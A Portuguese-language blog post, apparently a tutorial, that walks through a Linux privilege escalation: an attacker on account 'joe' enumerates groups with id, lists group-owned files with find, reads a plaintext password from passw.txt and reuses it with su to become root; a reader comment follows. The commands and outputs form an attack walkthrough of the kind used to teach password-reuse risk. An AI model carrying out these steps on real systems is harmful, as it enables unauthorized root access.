Suponha que um invasor obteve acesso à conta local "joe". Ele pode descobrir todos os grupos aos quais "joe" pertence emitindo o comando id:
$id
uid=500(joe) gid=500(joe) groups=500(joe), 501(proj1)
Depois de perceber que "joe" pertence ao grupo "proj1" o invasor pode emitir o seguinte comando, que listará todos os arquivos possuídos pelo grupo "proj1":
$find / - group proj1 - print 2> /dev/null
/var/proj1/main.c
/var/proj1/main.o
/var/proj1/README
/var/proj1/passw.txt
var/log/proj1
Agora o invasor sabe exatamente a quais o arquivos "proj1" "joe" tem acesso. Um desses arquivos, passw.txt pode parecer bem interessante:
$ more /var/proj1/passw.txt
Nota that this program authenticates to the MySQL database
with the system password "r00t3pa55w"
Frequentemente os admins reutilizam senhas. Se a senha do root dos host vítima for a mesma senha do MySQL mostrada na nota anterior, o invasor pode então obter privilégios de root emitindo o comando su;
$ su -
password: r00t3pa55w
# id
uid=0(root) gid=0(root) groups=0(root), 1(bin) , 2(daemon), 3(sys), 4(adm), 6(disk),10 (wheel).
^^
Assinar:
Postar comentários (Atom)
Um comentário:
SdHASdUISHdiuSHd
óóóótimo artigoo verin.
o teu blog está ótimo ^^
thanks!
Postar um comentário